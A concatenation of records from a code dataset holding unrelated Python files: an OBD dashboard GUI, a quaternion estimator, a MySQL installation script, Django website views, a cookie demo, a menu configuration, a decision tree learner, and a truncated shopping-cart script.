\"))\n self.alerts.setText(_translate(\"MainWindow\", \"Alerts\"))\n########################################### For QA\n def instrument_readings(self):\n x = 0\n \n connection = obd.OBD()\n rpmCmd = obd.commands.RPM\n speedCmd = obd.commands.SPEED\n fuelCmd = obd.commands.FUEL_LEVEL\n \n while 1:\n fuelResponse = connection.query(fuelCmd)\n rpmResponse = connection.query(rpmCmd)\n speedResponse = connection.query(speedCmd)\n\n fuelString = str(fuelResponse.value).split()\n rpmString = str(rpmResponse.value).split()\n speedString = str(speedResponse.value).split()\n\n if fuelString[0] != \"None\":\n fuel = float(fuelString[0])\n self.fuel_val.setValue(fuel)\n \n if speedString[0] != \"None\":\n # convert Kilometers per hour to Miles per hour\n speed = float(speedString[0]) * 0.62137119223733 \n self.speed_val.display(speed)\n\n if rpmString[0] != \"None\":\n rpm = float(rpmString[0])\n self.rpm_val.display(rpm)\n \n#################################################################### \n \n\n############################################### For QA\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n gui_window = Ui_MainWindow()\n gui_window.show()\n sys.exit(app.exec_())\n###############################################################\n","sub_path":"gui_test3.py","file_name":"gui_test3.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"481700326","text":"import numpy as np, scipy.optimize as optimize\n\ndef objectiveFunc(xVal, b, a):\n '''b is the source (pre-rotation) coordinate\n a is the destination (post-rotation) coordinate, \n '''\n w, x, y, z = xVal\n ww, xx, yy, zz = xVal**2\n return np.asarray([ \\\n b[0]*(ww + xx - yy - zz) + 2*b[1]*(x*y - w*z) + 2*b[2]*(x*z + w*y) - a[0], \\\n b[1]*(ww - xx + yy - zz) + 2*b[0]*(x*y + w*z) + 2*b[2]*(y*z - w*x) - a[1], \\\n b[2]*(ww - xx - yy + zz) + 2*b[0]*(x*z - w*y) + 2*b[1]*(w*x + y*z) - a[2], \\\n w*w + x*x + y*y * z*z - 1])\n\ndef jacobianFunc(xVal, b, a):\n w, x, y, z = xVal\n return np.asarray([ \\\n [ 2*b[0]*w - 2*b[1]*z + 2*b[2]*y, \\\n 2*b[0]*x + 2*b[1]*y + 2*b[2]*z, \\\n -2*b[0]*y + 2*b[1]*x + 2*b[2]*w, \\\n -2*b[0]*z - 2*b[1]*w + 2*b[2]*x], \\\n [ 2*b[1]*w + 2*b[0]*z - 2*b[2]*x, \\\n -2*b[1]*x + 2*b[0]*y - 2*b[2]*w, \\\n 2*b[1]*y + 2*b[0]*x + 2*b[2]*z, \\\n -2*b[1]*z + 2*b[0]*w + 2*b[2]*y], \\\n [ 2*b[2]*w - 2*b[0]*y + 2*b[1]*x, \\\n -2*b[2]*x + 2*b[0]*z + 2*b[1]*w, \\\n -2*b[2]*y - 2*b[0]*w + 2*b[1]*z, \\\n 2*b[2]*z + 2*b[0]*x + 2*b[1]*y], \\\n [2*w, 2*x, 2*y, 2*z]])\n\ndef estimate(source, dest, r0 = np.asarray([0, 1, 1, 1])):\n '''Estimate the rotation quaternion needed in order to rotate *source* into *dest*\n '''\n assert type(source) is np.ndarray and source.shape == (3, )\n assert type(dest) is np.ndarray and dest.shape == (3, )\n #r, infodict, ier, mesg = optimize.fsolve(objectiveFunc, r0, args=(source, dest), fprime=jacobianFunc, full_output=True)\n sol = optimize.root(objectiveFunc, r0, args=(source, dest), jac=jacobianFunc, method='broyden1')\n r = sol.x\n r /= np.linalg.norm(r)\n #return r, infodict, ier, mesg\n return r","sub_path":"rotationEstimator/rotationEstimator.py","file_name":"rotationEstimator.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"392728870","text":"#!/usr/local/bin/python3\n#coding=utf-8\n\nimport subprocess\nimport os\nimport shutil # 复制文件\nfrom progressbar import *\n\n#\n# 设计用途:\n# 基于二进制安装包,快速安装3306实例\n# 基本用法:\n# 上传 my_3306.cnf 文件到 /etc 目录下\n\ncnf_file_path = '/etc/my_3306.cnf'\ndata_path = '/data/mysql/3306/'\nerror_path = '/data/mysql/3306/data/error.log'\n\nversion_http_dict = {\n 'mysql-5_7_20': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.20-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_21': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.21-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_22': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.22-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_23': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.23-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_24': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.24-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_26': 'https://dev.mysql.com/Downloads/MySQL-5.7/mysql-5.7.26-linux-glibc2.12-x86_64.tar.gz',\n}\n\nversion_has_download_dict = {\n 'mysql-5_7_20': '/usr/local/mysql-5.7.20-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_21': '/usr/local/mysql-5.7.21-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_22': '/usr/local/mysql-5.7.22-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_23': '/usr/local/mysql-5.7.23-linux-glibc2.12-x86_64.tar.gz',\n 'mysql-5_7_24': '/usr/local/mysql-5.7.24-linux-glibc2.12-x86_64.tar.gz',\n}\n\n# 1. 创建MySQL用户和用户组\n\ndef add_mysql_user():\n try:\n cmd_create_group = 'groupadd mysql'\n (status, output) = subprocess.getstatusoutput(cmd_create_group)\n if status == 0:\n print('create group mysql success')\n else:\n raise Exception\n cmd_create_user = 'useradd -g mysql -d /usr/local/mysql -s /sbin/nologin -M mysql'\n (status, output) = subprocess.getstatusoutput(cmd_create_user)\n if status == 0:\n print('create user mysql success')\n else:\n raise Exception\n\n except Exception:\n print('create user and group mysql across a error,please check')\n\n# 2. 返回 MySQL用户和用户组 的uid, gid\ndef get_uid_gid():\n cmd_getuid = 'id -u mysql'\n cmd_getgid = 'id -g mysql'\n # os.popen输出的结果并不是char类型,需要read()出来,并截取换行符\n uid = os.popen(cmd_getuid).read().strip('\\n')\n gid = os.popen(cmd_getgid).read().strip('\\n')\n print('uid:', uid, 'gid:', gid)\n # return (uid, gid)\n\n\ndef get_verion(version):\n\n if version == 1:\n version = 'mysql-5_7_20'\n elif version == 2:\n version = 'mysql-5_7_21'\n elif version == 3:\n version = 'mysql-5_7_22'\n elif version == 4:\n version = 'mysql-5_7_23'\n elif version == 5:\n version = 'mysql-5_7_24'\n else:\n version = 'mysql-5_7_24'\n return version\n\n\n# 3. 判断要选择的版本\n\ndef input_get_version():\n\n print('''\nYou have 5 options for you Database version install.\n1: Install MySQL 5.7.20\n2: Install MySQL 5.7.21\n3: Install MySQL 5.7.22\n4: Install MySQL 5.7.23\n5: Install MySQL 5.7.24\n ''')\n\n version = int(input(\"Enter your choice (1, 2, 3, 4, 5): \")) #这里再加一个 Y/N\n version = get_verion(version)\n return version\n ### 退出提示\n #input(\"点击 enter 键退出\")\n\n# 4. 下载的二进制安装包\n\ndef wget_download():\n try:\n version_addr = input_get_version()\n print(version_http_dict[version_addr])\n download_mysql_cmd = 'wget -P {} {}'.format('/usr/local/', version_http_dict[version_addr])\n (status, output) = subprocess.getstatusoutput(download_mysql_cmd)\n if status == 0:\n print(output)\n print('wget mysql finished')\n else:\n print(output)\n raise Exception\n except Exception:\n print('wget mysql error, Please check the http addr')\n exit()\n\n# 5. 解压下载的二进制安装包\n\ndef untar():\n\n try:\n # version_addr = input_get_version()\n untar_cmd = 'mkdir /usr/local/mysql && tar -xzvf {} -C /usr/local/mysql --strip-components 1'.format(version_has_download_dict['mysql-5_7_24'])\n print ('start tar -xzvf mysql tar gz..........')\n pbar = ProgressBar().start()\n (status, output) = subprocess.getstatusoutput(untar_cmd)\n if status == 0:\n pbar.finish()\n print('untar finished')\n else:\n raise Exception\n except Exception:\n print('Exec untar across a error, Please check the zip file')\n exit()\n\n# 6. 把mysql base dir 归属到mysql用户下\ndef base_dir_chown():\n try:\n mysql_base_dir = 'chown -R mysql:mysql /usr/local/mysql/'\n (status, output) = subprocess.getstatusoutput(mysql_base_dir)\n if status == 0:\n print('chown mysql base dir success')\n else:\n raise Exception\n except Exception:\n print('chown mysql base dir error')\n\n# 7. 创建数据文件夹,并归属到mysql用户下\n\ndef prepare(port):\n try:\n os.makedirs('/data/mysql/{}/data'.format(port))\n os.mkdir('/data/mysql/{}/logs'.format(port))\n os.mkdir('/data/mysql/{}/tmp'.format(port))\n\n mysql_data_dir = 'chown -R mysql:mysql /data/mysql/{}/'.format(port)\n print (mysql_data_dir)\n (status, output) = subprocess.getstatusoutput(mysql_data_dir)\n if status == 0:\n print('mkdir data dir and chown mysql data dir success')\n else:\n raise Exception\n except OSError:\n print('create dir error,please check')\n\n\n# 8. 初始化实例\ndef initialize_instance(port):\n\n pbar = ProgressBar().start()\n cmd = '/usr/local/mysql/bin/mysqld --defaults-file=/data/mysql/{}/my_3306.cnf --initialize'.format(port)\n (status, output) = subprocess.getstatusoutput(cmd)\n # print('status:', status, 'detail:', output)\n if status == 0:\n pbar.finish()\n print('Initialize finished,now read mysql login temporary password')\n\n# 9. 接收指定的my.cnf文件,并复制到相关数据文件夹下\n# TODO:自动询问关键参数,并生成my_$port.cnf\n\ndef cp_cnf(cnf_file_path, data_path):\n if os.path.exists(cnf_file_path):\n try:\n shutil.copy(cnf_file_path, data_path)\n except OSError:\n print('copy failed,please check it')\n else:\n print('file does`s not exist')\n\n# 10. 提取错误日志中的密码\ndef get_error_password(error_path):\n\n # cat /data/mysql/3306/data/error.log |grep password\n cmd = 'cat {} |grep password'.format(error_path)\n (status, output) = subprocess.getstatusoutput(cmd)\n # print('status:', status, 'detail:', output)\n if status == 0:\n lists = output.split()\n print('\\033[1;33;44m login method:\\033[0m mysql -S /data/mysql/3306/data/3306.sock -p')\n print('\\033[1;33;44m password: \\033[0m %s' % (lists[-1]))\n\n\n# 11. 启动数据库初始化\ndef start_mysql_init():\n #cp /usr/local/mysql/support-files/mysql.server /etc/init.d/mysql\n #/etc/init.d/mysql start OR /usr/local/mysql/bin/mysqld --defaults-file=/etc/my.cnf &(生成.sock文件)\n cmd = 'cp /usr/local/mysql/support-files/mysql.server /etc/init.d/mysql'\n (status, output) = subprocess.getstatusoutput(cmd)\n if status == 0:\n print('cp support-files/mysql.server to /etc/init.d/mysql success')\n\n# 12. 启动数据库初始化\ndef start_mysql_server():\n #cmd = '/etc/init.d/mysql start'\n\n pbar = ProgressBar().start()\n cmd = '/usr/local/mysql/bin/mysqld --defaults-file=/data/mysql/3306/my_3306.cnf &'\n (status, output) = subprocess.getstatusoutput(cmd)\n if status == 0:\n pbar.finish()\n print('\\033[1;33;44m mysql server start success \\033[0m')\n else:\n print(output)\n\n #Starting MySQL.Logging to '/usr/local/mysql/data/mgr01.err'.\n #ERROR! The server quit without updating PID file (/usr/local/mysql/data/mgr01.pid).\n #说明 需要指定 my.cnf 配置文件\n\ndef main():\n\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"++ MySQL install start ++\")\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\n add_mysql_user()\n # input_get_version()\n wget_download()\n untar()\n base_dir_chown()\n prepare(3306)\n cp_cnf(cnf_file_path, data_path)\n initialize_instance(3306)\n get_error_password(error_path)\n start_mysql_init()\n start_mysql_server()\n\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"++ MySQL install sucesss ++\")\n print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\nif __name__ == '__main__':\n main()","sub_path":"install_mysql.py","file_name":"install_mysql.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"607850601","text":"from django.shortcuts import render, get_list_or_404, get_object_or_404\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage, InvalidPage\nfrom django.http import Http404\nfrom django.db.models import F\nfrom django.http import HttpResponse\nfrom polls.form import JoinForm\nfrom .models import Products, MyNews, JoinUs, Banner, JobRequire\nfrom django.views import generic\nimport re\n\n# 网站默认首页\n\n\ndef index(request):\n # banner_list = get_list_or_404(Banner)[:5]\n try:\n banner_list = Banner.objects.all()[:5]\n except Banner.DoesNotExist:\n raise Http404(\"数据库不存在\")\n\n num = len(banner_list)\n\n xx = range(1, num + 1)\n\n try:\n news = MyNews.objects.order_by('date')[:4] # 根据日期排列 读取前4条新闻\n except MyNews.DoesNotExist:\n raise Http404(\"数据库不存在\")\n\n my_list = []\n\n for new in news:\n # 忽略警告,必须在循环内定义,否则会覆盖所有dic\n dic = dict()\n # print(new)\n dic['id'] = new.id\n dic['logo'] = new.logo # 获取新闻列表中单个新闻的logo图片地址\n # print(dic['logo'])\n dic['title'] = new.tt # 获取新闻标题\n # print(dic['title'])\n # 获取新闻主要内容的首行文字,使用正则表达式 去掉html 标签\n txt = new.context.replace(' ', '')\n dr = re.compile(r'<[^>]+>', re.S)\n dd = dr.sub('', txt)\n dic['text'] = dd[:60]\n # print(dic)\n my_list.append(dic)\n\n # print(my_list)\n\n content = {\n 'title': '力众蓝天',\n 'banner_list': banner_list,\n 'num': xx,\n 'main': my_list[0],\n 'list': my_list[1:],\n }\n return render(request, 'polls/index/index.html', content)\n\n\n# 总经理致辞\ndef message(request):\n return render(request, 'polls/index/message.html', {'title': '力众蓝天'})\n\n\n# 品牌故事\ndef story(request):\n return render(request, 'polls/index/story.html', {'title': '品牌故事'})\n\n\n# 社会责任\ndef social(request):\n return render(request, \"polls/index/social.html\", {'title': '社会责任'})\n\n\n# 发展历程\ndef develop(request):\n return render(request, \"polls/index/develop.html\", {'title': '发展历程'})\n\n\n# 企业文化\ndef culture(request):\n return render(request, \"polls/index/culture.html\", {'title': '企业文化'})\n\n\n# hr\ndef hr(request):\n jobs = get_list_or_404(JobRequire)\n data = {\n 'jobs': jobs,\n 'title': '人力资源'\n }\n\n return render(request, \"polls/index/HR.html\", data)\n\n\n# 企业荣誉\ndef honor(request):\n return render(request, \"polls/index/honor.html\", {'title': '企业荣誉'})\n\n\n# 新闻中心\n# news_type:新闻类别,0:自己的新闻,1:行业新闻,2:媒体报道,3:技术交流\ndef news_view(request, news_type):\n\n if news_type == 0:\n title = \"力众蓝天新闻\"\n news_list = get_list_or_404(MyNews, news_type=0)\n elif news_type == 2:\n title = \"媒体报导\"\n news_list = get_list_or_404(MyNews, news_type=1)\n elif news_type == 1:\n title = \"行业新闻\"\n news_list = get_list_or_404(MyNews, news_type=2)\n elif news_type == 3:\n title = \"技术交流\"\n news_list = get_list_or_404(MyNews, news_type=3)\n else:\n news_list = get_list_or_404(MyNews)\n title = \"全部新闻\"\n\n news_list = mypage(news_list, request)\n\n content = {\n 'new_list': news_list,\n 'type': news_type,\n 'title': title,\n }\n return render(request, 'polls/news.html', content)\n\n\n# 产品默认显示页,根据参数 type_num 产品类型号进行产品分类,并输出list\ndef products(request, type_num):\n try:\n products_list = Products.objects.filter(type_num=type_num)\n except Products.DoesNotExist:\n raise Http404(\"Products does not exist\")\n\n products_list = mypage(products_list, request)\n\n context = {\n 'products_list': products_list,\n 'title': '产品页'\n }\n return render(request, 'polls/products.html', context)\n\n\n# 无参 产品页 显示全部产品\ndef all_products(request):\n try:\n products_list = Products.objects.all()\n except Products.DoesNotExist:\n raise Http404(\"Products does not exist\")\n\n products_list = mypage(products_list, request)\n\n context = {\n 'products_list': products_list,\n\n 'title': '产品页',\n }\n return render(request, 'polls/products.html', context)\n\n\n# 产品详情页\n# 显示单个产品的详细说明页\n# pk 产品id号\ndef detail(request, pk):\n print(\"------------产品id %s\" % pk)\n try:\n product = Products.objects.get(pk=pk)\n product.read_count = F('read_count') + 1\n product.save()\n product.refresh_from_db()\n except Products.DoesNotExist:\n raise Http404(\"Product does not exist\")\n title = \"产品详情页\"\n content = {\n 'product': product,\n 'title': title,\n }\n print(content)\n return render(request, 'polls/detail.html', content)\n\n\n# 联系页面\ndef contact(request):\n return render(request, 'polls/ContactUs.html')\n\n\n# 新闻详情页\ndef news_detail(request, pk):\n try:\n new = MyNews.objects.get(pk=pk)\n except MyNews.DoesNotExist:\n raise Http404(\"该新闻已过期!\")\n title = \"新闻详情页\"\n content = {\n 'new': new,\n 'title': title,\n }\n return render(request, 'polls/detail.html', content)\n\n\n# 解决方案详情页\ndef solution(request, pk):\n solu = get_object_or_404(Products, pk=pk)\n title = \"解决方案\"\n content = {\n 'product': solu,\n 'title': title,\n }\n return render(request, \"polls/detail.html\", content)\n\n\n# 解决方案 列表\ndef solution_list(request):\n s_list = get_list_or_404(Products, is_solu=1) # =1 表示筛选解决方案\n\n print(s_list)\n if not s_list:\n raise Http404(\"数据为空\")\n\n s_list = mypage(s_list, request)\n\n title = \"解决方案列表\"\n content = {\n 'products_list': s_list,\n 'title': title,\n\n }\n return render(request, \"polls/products.html\", content)\n\n\n# 按照分类显示 解决方案\n# 解决方案的分类 分为0:无效,1:SCR系统解决方案 ,2:燃油系统解决方案,3:润滑系统决方案,4:EGR系统解决方案\ndef solution_class(request, classify):\n\n products_list = get_list_or_404(Products, classify=classify)\n\n title = ''\n\n if classify == 1: # SCR系统解决方案\n title = 'SCR系统解决方案'\n elif classify == 2:\n title = '燃油系统解决方案'\n elif classify == 3:\n title = '润滑系统决方案'\n elif classify == 4:\n title = 'EGR系统解决方案'\n products_list = mypage(products_list, request)\n\n content = {\n 'products_list': products_list,\n 'title': title,\n }\n\n return render(request, \"polls/products.html\", content)\n\n\n# 招商页\ndef business(request):\n if request.method == 'POST':\n jon = JoinForm()\n if jon.is_valid():\n print(jon.cleaned_data)\n else:\n print(jon.errors)\n else:\n jon = JoinForm()\n content = {\n 'form': jon.as_p(),\n 'title': '招商加盟',\n }\n return render(request, \"polls/business.html\", content)\n\n\n# 表单提交\ndef submit_process(request):\n po = request.POST\n print(po)\n # todo\n n = JoinUs()\n n.product = po.get(\"product_name\")\n n.area = po.get(\"area\")\n n.name = po.get(\"name\")\n n.tel = po.get(\"tel\")\n\n n.save()\n\n mess = {\n 'title': '感谢',\n 'message': '信息已经提交,感谢您的关注!',\n }\n\n return render(request, \"polls/Tools/Message.html\", mess)\n\n\n# 分页处理函数\n# products_list: 需要处理的list\n#\ndef mypage(products_list, request):\n\n paginator = Paginator(products_list, 30)\n\n if request.method == \"GET\":\n # 获取 url 后面的 page 参数的值, 首页不显示 page 参数, 默认值是 1\n page = request.GET.get('page')\n try:\n products_list = paginator.page(page)\n # todo: 注意捕获异常\n except PageNotAnInteger:\n # 如果请求的页数不是整数, 返回第一页。\n products_list = paginator.page(1)\n except InvalidPage:\n # 如果请求的页数不存在, 重定向页面\n return HttpResponse('找不到页面的内容')\n except EmptyPage:\n # 如果请求的页数不在合法的页数范围内,返回结果的最后一页。\n products_list = paginator.page(paginator.num_pages)\n\n return products_list\n\n\n# 服务理念\ndef service(request):\n\n return render(request, \"polls/service.html\", {'title': '服务理念'})\n\n\n# todo\n# 后台页面显示 加盟信息\nclass MyListView(generic.ListView):\n template_name = 'admin/JoinUsList.html'\n\n def get_queryset(self):\n return JoinUs.objects.all()\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"59116059","text":"# /usr/bin/env python\n# -*- coding:utf-8 -*-\n# date:31/7/2016\n\n'''\n先写个获取CookieJar实例的demo\n'''\n\nimport urllib,urllib2,cookielib\n\n#获取Cookiejar对象(存在本机的cookie消息)\ncj = cookielib.CookieJar()\n#自定义opener,并将opener跟CookieJar对象绑定\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n#安装opener,此后调用urlopen()时都会使用安装过的opener对象\nurllib2.install_opener(opener)\n\nurl = 'http://www.baidu.com'\n\nprint(urllib2.urlopen(url))\nprint('------------------------')\nprint(cj)","sub_path":"cookielib/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"143458720","text":"# -*- coding: utf-8 -*-\n\nfmi_edit = {\"menu_id\": \"edit_menu_item\", \"menu_text\": \"Pas aan\", \"route\": \"edit\", \"flags\": [\"id_required\"]}\nfmi_delete = {\"menu_id\": \"delete_menu_item\", \"menu_text\": \"Verwijder\", \"route\": \"delete\",\n \"message\" : \"Zeker dat u dit item wil verwijderen\", \"flags\": [\"id_required\", \"confirm_before_delete\"]}\nfmi_copy = {\"menu_id\": \"copy_menu_item\", \"menu_text\": \"Kopieer van\", \"route\": \"add\", \"flags\": [\"id_required\"]}\nfmi_add = {\"menu_id\": \"add_menu_item\", \"menu_text\": \"Voeg toe\", \"route\": \"add\", \"flags\": []}\nfmi_view = {\"menu_id\": \"view_menu_item\", \"menu_text\": \"Details\", \"route\": \"view\", \"flags\": [\"id_required\"]}\nfmi_change_pwd = {\"menu_id\": \"change_pwd_menu_item\", \"menu_text\": \"Verander paswoord\", \"route\": \"change_pwd\",\"flags\": [\"id_required\"]}\nfmi_update_rfid = {\"menu_id\": \"update_rfid_menu_item\", \"menu_text\": \"Nieuwe code\", \"route\": \"new_rfid\",\"flags\": [\"bootbox_single\"]}\nfmi_delete_rfid = {\"menu_id\": \"delete_rfid_item\", \"menu_text\": \"Verwijder code\", \"route\": \"delete_rfid\",\n \"message\" : \"Zeker dat u deze rfid code wil verwijderen?\", \"flags\": [\"confirm_before_delete\"]}\nfmi_delete_time_ran = {\"menu_id\": \"delete_time_ran_menu_item\", \"menu_text\": \"verwijder gelopen tijd\", \"route\": \"delete_time_ran\",\n \"message\" : \"Zeker dat u deze tijd wil verwijderen?\",\"flags\": [\"confirm_before_delete\"]}\n\ndefault_menu_config = [\n fmi_edit,\n fmi_copy,\n fmi_add,\n fmi_view,\n fmi_delete\n]\n\nuser_menu_config = [\n fmi_edit,\n fmi_change_pwd\n]\n\nadmin_menu_config = [\n fmi_edit,\n fmi_copy,\n fmi_add,\n fmi_view,\n fmi_delete,\n fmi_change_pwd\n]\n\noffence_menu_config = [\n fmi_delete\n]\n\nregister_runner_menu_config = [\n fmi_update_rfid,\n fmi_delete_rfid,\n fmi_delete_time_ran\n]","sub_path":"app/floating_menu.py","file_name":"floating_menu.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"637801771","text":"import pandas as pd\nimport math\n\n\ndef getEntropy(data):\n contents = list(data.groupby(\"Play\").size()) # change accordingly\n total = sum(contents)\n if len(contents) == 1:\n return 0\n entropy = -1 * (((contents[0]/total) * math.log2(contents[0]/total)) +\n ((contents[1]/total) * math.log2(contents[1]/total)))\n return entropy\n\n\ndef calculateColumnEntropy(data, column):\n attributes = set(data[column])\n attributeCount = data.groupby(column).size()\n entropy = 0\n for attribute in attributes:\n current_entropy = getEntropy(data.query(\n column + \" == '\" + attribute + \"'\"))\n entropy += attributeCount[attribute] / \\\n sum(attributeCount) * current_entropy\n return entropy\n\n\ndef getTree(data):\n tree = {}\n rootEntropy = getEntropy(data)\n if rootEntropy == 0:\n return data[\"Play\"].iloc[0] # change accordingly\n\n leastEntropy = 100 # its bleh\n root = None\n\n columns = list(data.columns)\n columns.remove(\"Play\") # change accordingly\n for column in columns:\n entropy = calculateColumnEntropy(data, column)\n if entropy < leastEntropy:\n leastEntropy = entropy\n root = column\n\n subTree = {}\n for attribute in set(data[root]):\n subTree[attribute] = getTree(\n data.query(root + \"== '\" + attribute + \"'\"))\n\n tree[root] = subTree\n return tree\n\n\ndef get_decision(query, tree, nodes):\n if type(tree) == dict:\n node = list(tree.keys())[0]\n node_index = nodes.index(node)\n attribute = query[node_index]\n return get_decision(query, tree[node][attribute], nodes)\n return tree\n\n\nif __name__ == '__main__':\n data = pd.read_csv(\"data.csv\", dtype=\"str\")\n tree = getTree(data)\n print(tree)\n query = tuple(input(\"Query: \").strip(\" \").split(\",\"))\n print(get_decision(query, tree, list(data.columns.values[:-1])))\n","sub_path":"6th Semester/AI/10 - Decision tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"621473567","text":"import math\nnombres_productos=[]\ncantidad=[]\nprecios=[]\nsubtotal=[]\nbandera=True\n\nwhile bandera:\n entrada=input()\n comando=entrada.split(\"&\")\n item=comando[0]\n if item==str(1):\n articulo=comando[1]\n cant=int(comando[2])\n precio=int(comando[3])\n sub=(cant*precio)\n nombres_productos.append(articulo)\n cantidad.append(cant)\n precios.append(precio)\n subtotal.append(sub)\n elif item==str(2):\n cedula=comando[1]\n total=sum(subtotal)\n if total<150000:\n descuento=0\n elif 150000<=total<=300000:\n descuento = total*0.1\n elif 300000